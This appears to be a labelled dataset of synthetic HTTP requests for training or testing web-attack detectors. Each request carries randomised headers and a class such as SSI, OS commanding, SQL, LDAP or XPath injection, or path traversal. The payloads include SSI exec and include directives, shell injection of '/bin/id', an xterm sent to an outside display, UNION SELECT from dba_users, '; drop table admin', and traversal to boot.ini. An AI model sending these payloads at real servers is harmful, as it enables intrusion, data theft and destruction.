GET /eeee.png?waa=45235228&3eFsm=nwtcl9e1nmp&nif1.qTTdn=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.1
Host: 22.159.228.102
Connection: dvooo
Accept: application/postscript;q=0.4, application/*;q=0.7, video/quicktime;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, identity;q=0.0, deflate
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 240.199.60.134
Cookie: I1Bg@=amsGzNwqeE;9ini=rdroptlh=@
Cookie2: $Version="350"
Date: Fri, 26 Oct 07 02:53:56 GMT
ETag: W/"jRsIL1CqmGtIEhLf-xD7"
Expect: nt2ywf=tydio8l;a2tap7a9=yuui4
From: saxeqIt@wdataw7.be
If-Modified-Since: Sun, 06 Sep 09 23:29:26 CET
If-Unmodified-Since: Mon, 12 Jun 06 09:09:42 CET
If-Match: "Ax_Hwmw7aTiwjzh"
If-None-Match: "N.cmXCUp8aUw.1p8dC"
If-Range: "QEelm2mgLh-UbRfP0"
Max-Forwards: 86
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic c2ltMjpzYWdlYjVhYQ==
Authorization: Digest realm
Range: 5-9725,-6683
Referer: /h8ceirRS/lRturse/uera0t/h4wsmiy/isl9oe1o.nsf
TE: trailers,trailers
Trailer: Date
User-Agent: 9itt5dsiin/9.9
UA-CPU: 68000
UA-Disp: 274,6270,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 833x510
Via: A2e/2.1 190.100.23.126
Transfer-Encoding: deflate
Upgrade: sjrtoN/2.4, ytwq/5.4, RmLke/9.3, citRri/1.2
Warning: 181 99.114.125.39:5648 "7neetnanYrOl" "Tue, 11 Jul 06 10:45:12 GMT"
X-Forwarded-For: 252.9.253.184
X-Serial-Number: 2940498240401251
----: ----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 39239
Start - Id: 43345
class: OsCommanding
GET /td5D1x_xsQMxPi93/eJh9AtW5RCm/Uswinnt/ofnqe/0xterm5BDFVX/eB0SE_YkCl/uwreaaocs0b2t/fhQArnkpnn3/ipQi/5SOH2b-Qinclude8Ocopyi/puyPvFjqmD_3j/j59-I@USfLb0.pl?nlOm=oqw&eddt6oetc=2h&TwewNothlbh=71KqPm&lZ=%250A+++xterm+++-display++www.nili.com%3A0.0&m8mrhbeSkooom=75 HTTP/1.0
Host: www.rar2n.net
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9;q=0.3, macintosh;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 39.142.10.38
Cookie: oyTmq1=:n;Elinwmll7=iNfte0zaunnhildagd;iuLclooBtri=usriiAs9;ro0igo0y=abgaoiC
Cookie2: $Version="05"
Date: Thu, 10 May 07 24:52:23 CET
ETag: "ZtsaybANwxvciPTcmh"
Expect: 100-continue
From: tz687o@hnoaaeiE.it
If-Modified-Since: Thu, 05 Apr 07 13:43:15 UTC
If-Unmodified-Since: Sat, 12 Feb 05 03:01:04 GMT
If-Match: *
If-None-Match: "jX5ohiZcI@m6RCZ"
If-Range: *
Max-Forwards: 74
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest nc=0dbF188e
Authorization: desngn piBmna=tHse
Range: -3
Referer: http://adsx0wna.org/hvnror/n1cAd/tEYitlvn/nnme/epotieos.zip
TE: trailers,trailers
Trailer: If-Range
User-Agent: 0nshoiotdrtao
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 331x628
Via: 9.8 44.177.7.59, 7.9 www.0tso.jpg, 6.0 www.naoe5uRo.shtml
Transfer-Encoding: identity
Upgrade: kxea/4.4, ru5/6.4, ttftd/1.9
Warning: 673 www.eotg.jpeg "ttFtvipf" 
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 3733669583698502
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43345
Start - Id: 40361
class: SSI
GET /ttsqdow.tiff? HTTP/1.0
Host: www.pavsr0hhv.cz
Connection: Oncdje
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: re-o;q=0.7, cekt-epresi;q=0.8, e1titss0-6aaMi3;q=0.5, Eega-e6hr
Cache-Control: max-age=92
Client-ip: 245.2.64.69
Cookie: IuiEu=17766;mhFenn1Efmde=0tnralselslb;a1=eJJ6f
Cookie2: $Version="4"
Date: Sat, 20 Jun 09 05:01:51 UTC
ETag: W/"qy6p@KNY937TrpTFqp_r"
Expect: dyooSh0e
From: ouihnh@oa6f8eoet.gov
If-Modified-Since: Tue, 27 Jul 04 06:22:14 UTC
If-Unmodified-Since: Sat, 02 Feb 08 23:12:31 CET
If-Match: *
If-None-Match: "kMB7OqcuvssF0b_rd"
If-Range: Wed, 15 Apr 09 15:47:08 UTC
Max-Forwards: 23
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic RHJkOTp5dGFyNG8=
Range: -62942,193769-
Referer: /jev77Hbx/nhtt2le/io1Mkft/hsnot5a/lucw.zip
TE: gzip,trailers,deflate;q=0.8
Trailer: Referer
User-Agent: <!--#include   virtual="d:\windows\autoexec.bat"    -->
UA-CPU: StrongARM
UA-OS: Windows 98
UA-Pixels: 7186x8117
Via: 7.6 161.93.150.224
Transfer-Encoding: gzip
Upgrade: fwr/8.8, o6abt/9.6
Warning: 214 www.ioarta.gif "t2kbllTyjTr61loIramt" "Sun, 01 Jul 07 21:32:40 UTC"
X-Forwarded-For: 76.58.9.70
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40361
Start - Id: 43482
class: OsCommanding
GET /olRtr1dstfbhkc/zEqD0KRe_RJ-KYd/T1C/sSYwseASr3s5@hs/h9/c6tcewc8s/zmK@3WksaU36o/qtautemoeeg/pD0oDv6/vbscriptSg0.css?nnsqt3f=%5C%3B++++%5C%2Fbin%5C%2Fid++%3B HTTP/1.1
Host: 252.23.25.168
Connection: close
Accept: image/*, image/*, text/xml;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: ohhLli-njtebHqi, sal1kC-Utd2briw, dlneaj2-pihni;q=0.5, ds-i, Bidw-fs;q=0.7
Cache-Control: min-fresh=122
Client-ip: 255.41.98.184
Cookie: dncHtoee=84;hf=0947515
Cookie2: $Version="51"
Date: Tue, 07 Apr 09 11:30:13 GMT
ETag: W/"@K4eB7R86idDJqDsd"
Expect: 100-continue
From: 0rhyil@a9lhonata.it
If-Modified-Since: Fri, 18 Jan 08 06:42:10 CET
If-Unmodified-Since: Wed, 17 Sep 08 08:01:37 GMT
If-Match: "OtbeV5X9_7gFD8qhA2"
If-None-Match: ".LEOUGsr8Y.wmNOj"
If-Range: Tue, 24 Jan 06 04:20:09 CET
Max-Forwards: 7468
MIME-Version: 3.9
Pragma: h='de'
Proxy-Authorization: Basic dHR3SVJyaWU6ZHJhdGVtOA==
Authorization: snnone tsht4=D3doear
Range: 4-
Referer: /dnnGqq/tyetl/uaqlsfsA.cgi
TE: gzip,trailers,chunked;q=0.9
Trailer: Range
User-Agent: Mozilla/8.6 (Windows; U; Win98 7.9; Be-hU; rv:1.2.2) Gecko/32087758
UA-CPU: Sparc
UA-Disp: 6546,0956,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2941x889
Via: 7.9 www.3fdsttd.png
Transfer-Encoding: deflate
Upgrade: fnnrrl/9.4, febrea/6.3, qsal/0.4, T0ng5e/2.6
Warning: 847 www.0te1.css "ctnpcrbrylblaepn" "Wed, 02 Aug 06 09:38:06 UTC"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 5600215
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 43482
Start - Id: 38377
class: LdapInjection
GET /3i0j/httpssock_streamMD9yCQB5BuwY/nA4qv3ipc@ttEhEsxK/sDzK-JtyLz9tkoBx/z-idRS/fhmape/s-Tw7/Kx.asmx?irein=6&texecVLtuWmochaEa=tc%29%28%7C%28oa%3D*%29&I0LtnomSasuite=oturkxabI+et7bs&a3aanooQ=etUljgz25EKp&oyOa=h%7Ciz&flslg=ern&rRantxmZe=l5d&Eeye=0645&amsiI=04822753&oide4aThefotN61=%26si%260&eermuaiPejet8=%5DurL3a HTTP/1.0
Host: www.i20lge.org
Connection: close
Accept: text/*
Accept-Charset: koi8-r, x-mac-turkish, x-mac-arabic
Accept-Encoding: deflate
Accept-Language: nanaaanc-ottecbu, aEeto-lt4A, eifs-cfis1hT, aepua-weoTlder;q=0.6
Cache-Control: min-fresh=95476
Client-ip: 41.189.98.25
Cookie: soexcziimt=unqeobaR-nie5bh?stdinr;fx38=6ntmp;oeRr9egtt=tKecXKxE
Cookie2: $Version="9"
Date: Mon, 08 Sep 08 15:44:05 UTC
ETag: "_tbcCy0@wz8M8jd"
Expect: 100-continue
From: frlm@ctsi1ez.ch
If-Modified-Since: Tue, 27 Jul 04 24:52:40 UTC
If-Unmodified-Since: Wed, 04 Nov 09 20:13:54 CET
If-Match: "x3Veeu-2SRCXR1YS"
If-None-Match: *
If-Range: Thu, 25 Oct 07 02:09:59 CET
Max-Forwards: 7438
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic c2dsb2VzOmx0c2NCNHM=
Range: -0,582766-
Referer: http://www.ec4i.com/eave9/oaNzue.txt
TE: trailers,trailers,deflate
Trailer: Referer
User-Agent: Mozilla/8.1 (X11; U; Linux i586 4.5; qh-jd; rv:0.3.3) Gecko/43690055
UA-CPU: 68000
UA-Disp: 6597,6108,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 554x9666
Via: FTP/0.6 www.ydydaett.shtml:7476
Transfer-Encoding: deflate
Upgrade: rysE/9.0, mt3/0.2, 84ag/2.9
Warning: 306 www.u4zhxszn.shtml "rahmw" 
X-Forwarded-For: 18.81.134.210
X-Serial-Number: 85165873223938
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38377
Start - Id: 41242
class: SqlInjection
GET /Vvbscriptp/dRqJZs5kUBmefgZwAfgZ/EzpNwinntI0Ypiu8Z/ceeecrohs5uizaoei/n.kf4dHebisSp/having4OBP/rSaeeeicydqhg/ic3iitra/mjKdwD.AvvF9X4eVrE/0ermgLynt.png?raetgutLt4a8e0i=0boot.iniov8nishh0wseos&miheeUei=hLl7H&shaIRiu=nmnauij5uosmochaGe&5eemDoLsesiX=Jstopy4l&o2zpt4aiVasan=%3A95M2%24f31t&ubeeemMseno=71 HTTP/1.1
Host: 153.91.82.119
Connection: close
Accept: video/quicktime, video/*, image/*;q=0.1
Accept-Charset: *
Accept-Encoding: ';  drop    table   admin
Accept-Language: *
Cache-Control: no-transform
Client-ip: 243.20.245.237
Cookie2: $Version="2"
Date: Fri, 17 Apr 09 03:56:51 CET
ETag: W/"qVHVETCstnO6syV"
Expect: auPvos
If-Modified-Since: Fri, 26 May 06 13:55:29 CET
If-Unmodified-Since: Fri, 17 Jun 05 15:46:05 GMT
If-Match: *
If-None-Match: "VpPG3EnI8skUU4Z5cDCP"
If-Range: Sun, 31 Jul 05 07:21:11 UTC
Max-Forwards: 9
MIME-Version: 4.6
Authorization: Basic aUlnRWF1OmltZFhpZg==
Referer: /ilisTcca/i4ul.bin
TE: trailers
User-Agent: oradr/8.7.6.1
UA-CPU: 68000
UA-Disp: 9585,9750,32
UA-OS: Linux
Via: 5.4 2.32.141.59, 7.6 136.67.91.118:3, FTP/2.0 www.m6Npe.gif
Transfer-Encoding: identity
Upgrade: nI4c/2.6
X-Forwarded-For: 248.13.251.126
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41242
Start - Id: 38572
class: LdapInjection
GET /niwcvc_La1Yk_K6G/ljCq./ap/bgiXiSp3oOsbZmCn3i/mJxmlhpqgi8/led2tTU/mOrPnLOxshutdownB7Wxxp_/passthru10xU/r@WsI2CQrjQ-906r.jsp?besunee5rsa=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: 45.113.50.231
Connection: t0munb
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: Nce2-icho;q=0.5, Ne-rhb4brkT, e3-eetrrt, Aysr-i;q=0.6, N-n;q=0.5
Cache-Control: no-store
Client-ip: 231.216.109.79
Cookie: otnsx=ee8el;39CpuL=ge  tst rsala
Cookie2: $Version="987"
Date: Fri, 25 Dec 09 21:14:05 CET
ETag: "P0FYr3vOYR-9J60W8X"
Expect: UpT3s
From: rdtaepw@enuD8ssxt.biz
If-Modified-Since: Thu, 08 Sep 05 08:25:03 GMT
If-Unmodified-Since: Sun, 18 Jan 09 24:02:00 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 16 May 08 11:41:00 CET
Max-Forwards: 7861
MIME-Version: 6.9
Pragma: hmiuh6=2
Proxy-Authorization: Basic bGVhY286c3RvcnNz
Authorization: te0cr rhsa=daNhaixq
Range: -5
Referer: /AsHaNtt/seoe/eiem.tar
TE: trailers
Trailer: If-Range
User-Agent: Idjrakkwae (sUQ0wK4yI; i6OtY1T8b; inUUo3dpd4)
UA-CPU: PowerPC
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 233x5921
Via: 8.2 77.139.118.111
Transfer-Encoding: compress
Upgrade: iSr/6.2
Warning: 149 www.memO4ih.js "gsEeeekriesa" "Mon, 30 Nov 09 07:31:03 GMT"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38572
Start - Id: 40308
class: SSI
GET /tyd.P1tx/VHfH5XVtx2ISzcb/ecxG2zmJ3Y/RskEap0FVoF10/rWD.-JbjmGLzk5s/eDidot/hJ1/3eawofmoastodfoE/esZrecs0/55.2auCUfg/pBDU.Or.dll?wandt74a=n2&rehs1dnltartaIt=680667&6LG5YF_DuYs=64513&n7aano=%3C%21--+%23exec+++cmd%3D%22c%3A%5Cprogra%7E1%5Cmbs%5C5cse2rn%5CMubao.exe+++++d%3A%5Cehiagahdo%5Cwww.nasisede.org%5C0etns6ia%5Cdatabase.mdb++%2Fx++exporttofoxpro%22--%3E&ekro6oOaLgid=eppiji0eigEswi&ieanorsth7ottl=tdp%25renuprocessing-instructionaf&oatadweEto=eO72wWba4iXw&Sf=iehu&mEutk=81259344 HTTP/1.1
Host: 216.115.96.19
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ba-emuhc2pw, inmRil-kge0s;q=0.6, 6O-lmehs;q=0.9, r-oeouaehf, 8ssojtui-vrr;q=0.7
Cache-Control: max-stale
Client-ip: 189.175.1.221
Cookie: tdauCHbhbh2=nxhg\libd;eg2we78ye=nOsystemnnt Ln;voib0iemeo5s=eZo;Ht3ecemiua=qybk4E4OB2;3ecyLie3iR=3;object-J1M3YV@PT-=d@L6sjDw
Cookie2: $Version="373"
Date: Fri, 31 Jul 09 24:36:33 GMT
ETag: W/"ko4dHKFzFsOi3L6r9_hf"
Expect: 100-continue
From: Yphp8ra@sCnoSst6.de
If-Modified-Since: Fri, 20 Feb 09 19:19:36 CET
If-Unmodified-Since: Wed, 03 Sep 08 20:37:04 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 18
MIME-Version: 3.6
Pragma: k1ih5L=eerhtEq
Proxy-Authorization: NTLM MTR2dHIxOWJoZWlrZ2huYWVUc2VubjJlYXhnb2k3ZXQ=
Authorization: Digest nc=c473921A
Range: -2115,0045-233,-51
Referer: http://ilmdaay.org/ie1d.fgf
TE: deflate;q=0.5,chunked;q=0.9,trailers
Trailer: If-None-Match
User-Agent: npoh38SFl
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 2184x777
Via: 0.3 78.171.60.206
Transfer-Encoding: deflate
Upgrade: llx/6.8, susFt/0.9, sep2er/8.1, fxahr/9.5, oEs/3.3
Warning: 569 252.52.85.196 "izcvnbou" "Wed, 03 May 06 17:08:51 CET"
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 475557970524
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40308
Start - Id: 40217
class: SSI
POST /oW7W.png? HTTP/1.1
Content-Length: 105
Content-Language: at8,bzit,St
Content-Encoding: gzip
Content-Location: /pE4nT5ee.aspx
Content-MD5: dmVhZHg5dG5vNGNvcms3OQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Aug 09 21:16:24 CET
Host: 84.237.76.21
Connection: keep-alive
Accept: image/*, image/*
Accept-Charset: *;q=0.4
Accept-Encoding: deflate, compress;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 226.109.209.93
Cookie: nOiChnRlo=<!  #<!--     #exec   cmd="id"-->;ecPmenoe0rm=iNchO;OG8THLTp6=71;1msearC=tsmumE
Cookie2: $Version="9"
Date: Fri, 28 Dec 07 12:09:45 CET
ETag: "0oxhxM5MkomRV-bym8"
Expect: ecubr=Lnah
From: senhn3h@iaStgea.it
If-Modified-Since: Sun, 29 Jun 08 20:49:20 UTC
If-Unmodified-Since: Sat, 10 Dec 05 15:47:37 UTC
If-Match: *
If-None-Match: "QrpWm@SUDxcZpYsn"
If-Range: Sat, 17 Feb 07 05:39:10 CET
Max-Forwards: 028
MIME-Version: 8.0
Pragma: emtsN=thdsnh
Authorization: Basic aWFlam5lMHU6RW50dHQ=
Referer: /bheiavd/jegstui.js
TE: trailers,deflate;q=0.2
Trailer: Connection
User-Agent: Mozilla/4.4 (X11; U; Linux i386 5.7; mU-ss; rv:4.1.0) Gecko/96375913
UA-CPU: StrongARM
UA-Disp: 6575,8438,8
Via: FTP/2.7 123.18.57.166, 8eaon/6.7 174.205.185.193, FTP/4.3 159.25.247.187
Transfer-Encoding: identity
Upgrade: tab/5.4, Crrr/1.3, icc/8.8, achfnw/2.6
Warning: 352 www.rt0dic.htm:27 "iOefoiwpe5htYvn" "Fri, 11 May 07 16:23:26 UTC"

outltacn0xlht=hd&aToo=apne&XKLdivfG=qwXOiv&attjeseOLhth=130&ofooleyoi=nmiwindow.openvartncoy&8wJzi=074561

End - Id: 40217
Start - Id: 39655
class: SSI
GET /i1zb8updatelinkYM/SFJFUpasswdKCsystemg9xG/l@0SFoCq/m6kTleep/rEoWI/I7/osapayshrsapDeezses/8jilawqEsEfjO/fiPC5Nhu7ewpWIVj/HnuJLNkv8BinadminTw3.htm?0bintTJBZrCV4c=hybnnUbh5fti6jeyr&NdmoytwL0de=%3C%21--++%23include+virtual%3D%22%2Fetc%2Fpasswd%22--%3E&cHhrnT=%3BeStB%2Bs51%24c HTTP/1.1
Host: 118.220.69.8:90678
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: cp-932, windows-1252;q=0.6, iso-8859-7;q=0.5, windows-1258
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 193.240.238.168
Cookie: dzO_W=hwvDiWxy
Cookie2: $Version="2"
Date: Sat, 28 Feb 04 14:25:49 UTC
ETag: "bgzQc-vq1mgSf1lPiZg"
Expect: 100-continue
From: lenzhrem@dasbEmim.st
If-Modified-Since: Sun, 16 May 04 13:55:03 GMT
If-Unmodified-Since: Fri, 16 Apr 04 16:00:02 CET
If-Match: *
If-None-Match: *
If-Range: "H6HZBOgvt6JutE6"
Max-Forwards: 99
MIME-Version: 6.4
Pragma: 2itty='bbh2cj'
Proxy-Authorization: NTLM Mm41YzRyZ2VsbDdzbWxhdHRyeXRzbm1jaHNtc245aXQ=
Authorization: Digest response="7990c8aD25A18B6bFB7a1D1BBAdb1e1f"
Range: 54-,0-33,3-74
Referer: /dpmkfe7/vit5/dAhsc11q/kt1yza.css
TE: trailers,trailers,deflate;q=0.5
Trailer: Authorization
User-Agent: Mozilla/5.3 (Windows; U; WinNT 2.6; ej-uI; rv:3.4.9) Gecko/30027612
UA-CPU: PowerPC
UA-Disp: 9927,407,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 824x2437
Via: rsc/4.8 www.Oasndl.css, 3.4 170.84.59.159
Transfer-Encoding: deflate
Upgrade: o7s/5.6, dipl/2.7
Warning: 182 174.22.41.47 "UhdAhltnsetaa1re" 
X-Forwarded-For: 50.214.174.78
X-Serial-Number: 659531112
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39655
Start - Id: 36091
class: PathTransversal
GET /ruY2FM_dE-DHe/s1f0e7/t41hhaynzeh5t/9@ZsystembOCZ/styleDkyXMIir3-xN6/ft9/yqb0kmpaihagenn/fcvIEHDoRTcBqR.pl?Rt=277&aeice7nhee=65&ToTinn=tya%3EEimi%5Crv%7E%7Ewindow.opena%255do%3C&bnfeue=ueeveBercpn5nceabi&sltamraiamlAiee=455&boezteeK5itsA=551&ALKjL7=84029168&YkQX=esna&hI7_pHjaV=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat HTTP/1.1
Host: www.oITezshTv.cz:80
Connection: close
Accept: video/quicktime;q=0.4, image/jpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: t8i-jttta1ya;q=0.4, qH-ocot, kohn-b;q=0.3, Oftuirbd-tCrahrl9, mqtshes-siobl
Cache-Control: no-transform
Client-ip: 111.21.56.24
Cookie: atmule=DN ;tfo5ru2hSitneos=486720;8nigochrssr=27329713;qRkUS.u0a=ieAhe
Cookie2: $Version="56"
Date: Fri, 30 Nov 07 22:23:32 UTC
ETag: W/"w@DJCsaO3EzHQ2pfaw0G"
Expect: urhmnt=re1d
From: 2srfon@a2wsst04Ft.cz
If-Modified-Since: Mon, 24 Mar 08 01:19:56 GMT
If-Unmodified-Since: Mon, 26 Mar 07 01:15:47 GMT
If-Match: "pJAnMs@qp5xjKKVe"
If-None-Match: *
If-Range: "QVsJ.ZguPpzRQhYOp8d"
Max-Forwards: 73
MIME-Version: 8.7
Pragma: m='plP90'
Proxy-Authorization: Digest username="ftps"
Authorization: NTLM amJzZXlpdHpiZTVsaWFic3J0cnhpTnRpY2FwZVl0YXNvYWllaW1oZGRpbGE=
Range: 580617-399630,-49399
Referer: http://jsupE.uk/atEdB763/oxcu/eSi8o.txt
TE: trailers,deflate;q=0.7,trailers
Trailer: Pragma
User-Agent: isIse4iageoo3fHelZe
UA-CPU: 68000
UA-Disp: 6269,3972,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 5584x598
Via: 2.7 101.14.29.209:9
Transfer-Encoding: identity
Upgrade: Fd1sk/0.3
Warning: 647 231.206.148.64:01 "5tdtn" 
X-Forwarded-For: 67.242.104.199
X-Serial-Number: 521332915
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36091
Start - Id: 35862
class: XPathInjection
GET /epsccd6ieeO/4y/bR2ffiaeGO7Cspitw/7K/dohuRxUVJOHb.aFLUy/ltslocu4/6R/8suFln7N.jpeg?NNyta=nJj&RqteAR_DCxml7=wtaelha%27++or++++1%3C+++aGj4u%2Fo%2Fmsnhic%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D1%5D+++or+++++%27atnLwe%27+++%3D%27&etghMoTcihh=snmensSco&X982execwEi=id%2Fa&eoc=r44oh8_O-&sTS4id=0349&nm3iCetgltRcoue=04&ipr=cmdqftpJ%7E-Zat HTTP/1.0
Host: www.EbHtubHttr.ch:828
Connection: gijaejF
Accept: text/html
Accept-Charset: *
Accept-Encoding: identity, identity, identity, deflate, deflate;q=0.9
Accept-Language: dnhsLdhe-1yhoher;q=0.8
Cache-Control: no-transform
Client-ip: 155.41.173.240
Cookie: yni=heehe;tSr=770
Cookie2: $Version="9"
Date: Sat, 01 Aug 09 15:24:23 GMT
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: 100-continue
From: alcSeiee@shniectns.be
If-Modified-Since: Fri, 04 Feb 05 15:44:47 UTC
If-Unmodified-Since: Mon, 08 Mar 04 01:23:27 CET
If-Match: *
If-None-Match: "BlCZQWjcdpaHadCLPdz"
If-Range: Tue, 09 Sep 08 04:20:52 UTC
Max-Forwards: 4
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic MGFnc01zaWk6cDlzaW4=
Authorization: Digest response="Ee064f23f7eeAbcACf76feafAa1dfbd0"
Range: -15
Referer: /2aemn/itegd/6snna/hsnmsha/rlib7s8.wmn
TE: trailers,gzip
Trailer: Range
User-Agent: Mozilla/4.1 (Windows; U; Windows NT 5.5; aa-en; rv:0.0.4) Gecko/90270913
UA-CPU: Sparc
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0823x5331
Via: 7.1 www.vsirMnoE.png, 8.2 www.w11e.png
Transfer-Encoding: compress
Upgrade: ei2y/3.0
Warning: 278 124.130.70.150 "dewioT68Dmdytekib4" "Tue, 23 Nov 04 10:02:15 GMT"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35862
Start - Id: 45790
class: PathTransversal
GET /50QJV@31g/ban78ewso/jMJn59G/aOfaU0eI8qda/gadminj/u4PtPw1qVDN7u.mdb?VautoexecGiekHcA=1%3A%5Cwinnt%5Cboot.ini HTTP/1.1
Host: 191.242.96.115
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1250, x-mac-chinesesimp;q=0.3, big5, cp-932
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 40.147.120.92
Cookie: 66tyb=639;0AiframedeIh8usrZ9=6;p9aef0odseanh6o=erU
Cookie2: $Version="2"
Date: Sat, 28 Aug 04 14:56:22 CET
ETag: "1UYXYoyn1ISOZ-ytTEbk"
Expect: 100-continue
From: rsj6lTrn@Ezll0rry.ch
If-Modified-Since: Fri, 15 Aug 08 10:56:09 UTC
If-Unmodified-Since: Tue, 19 Jul 05 15:42:05 CET
If-Match: ".lNbtNaNX-GY@JWd"
If-None-Match: "tm2vALpcmhbfa@eOmu"
If-Range: *
Max-Forwards: 5873
MIME-Version: 2.9
Pragma: Bihebek=odi0ia
Proxy-Authorization: attk esmu5=OSiF3tt
Authorization: nt9ro ihteu=d6nton
Range: 855-
Referer: /rdhse7/ivpbp/AascO.asmx
TE: trailers,chunked
Trailer: Accept-Language
User-Agent: wuMc99qm_ http://www.aseds.ch
UA-CPU: PowerPC
UA-Disp: 4288,202,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 9422x259
Via: 9.3 150.184.72.220, HTTP/0.9 www.aRrRc.jpeg:5595, 0.7 229.182.187.118
Transfer-Encoding: tieim; tened7e=alw8x9
Upgrade: F3awa4/4.3, 9rim7/0.4, reilie/2.8, 3il/4.5, Stse/6.1
Warning: 610 192.1.135.3:2396 "ysstaeiltotrenks" "Sun, 26 Mar 06 18:59:14 UTC"
X-Forwarded-For: 231.162.6.186
X-Serial-Number: 06918680418533
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45790
Start - Id: 41834
class: SqlInjection
GET /Plk1OxmQ@8Ky0d/htpassfQC_i-dWfTmtmpbx/t2Rn_XXThWXRghay/e0uHtud0rn8oq776ya9/ReNmikoil4.jpg?fhckErna0apeal=059&neul5oi=-dantteasro%25e&oah3egifuD=92972&rddmeNpeaa1wpi=90557&wErirrqrsvs=wsidsr&iT=wn5ft%27%2F**%2FUNION%2F**%2FSELECT%2F**%2FEectetm57b%2F**%2FFROM%2F**%2Fdba_users%2F**%2FWHERE%2F**%2Fekc6Fi%2F**%2Flike%2F**%2F%27%2525&nNersj=032092 HTTP/1.0
Host: www.oeSu.com
Connection: g9P7
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: D6-kbA, ae-te;q=0.8
Cache-Control: only-if-cached
Client-ip: 196.90.56.27
Cookie: H1uASvO=5658170;otbginddm7es=4;autoexecLRIIP3winntmail=nY8JU;DgfQk1n5a=8404
Cookie2: $Version="58"
Date: Sat, 15 Dec 07 20:00:16 CET
ETag: W/"sEO6-Hh4WcNew12P"
Expect: 3hnAo
From: wIdO@lerc.gov
If-Modified-Since: Mon, 07 Mar 05 04:57:19 UTC
If-Unmodified-Since: Sun, 14 Mar 10 16:37:45 UTC
If-Match: "uksNWcbA@zsg4cd"
If-None-Match: "a9kd1k72KCg5uAD"
If-Range: "yPkp7d0f8_yExhrUxI"
Max-Forwards: 40
MIME-Version: 5.5
Pragma: istgut='utsar'
Proxy-Authorization: NTLM ZDhzdGFlcmRSaGlvNXR5aW9tMHFkU3JpY2VpaXV5ZW56Y2Rsbw==
Authorization: NTLM dDBtTDh5Z2hyQmFibWlzZWxzYmF0T3lkYXhweW5yb2k0Yg==
Range: -0842
Referer: /ecId/eeAc/atru/e3tsx/t4otueei.sh
TE: deflate;q=0.0
Trailer: Max-Forwards
User-Agent: Mozilla/5.2 (compatible; MSIE 2.6; Linux i386; sJijrja; hrneexr; a1ofottn8)
UA-CPU: StrongARM
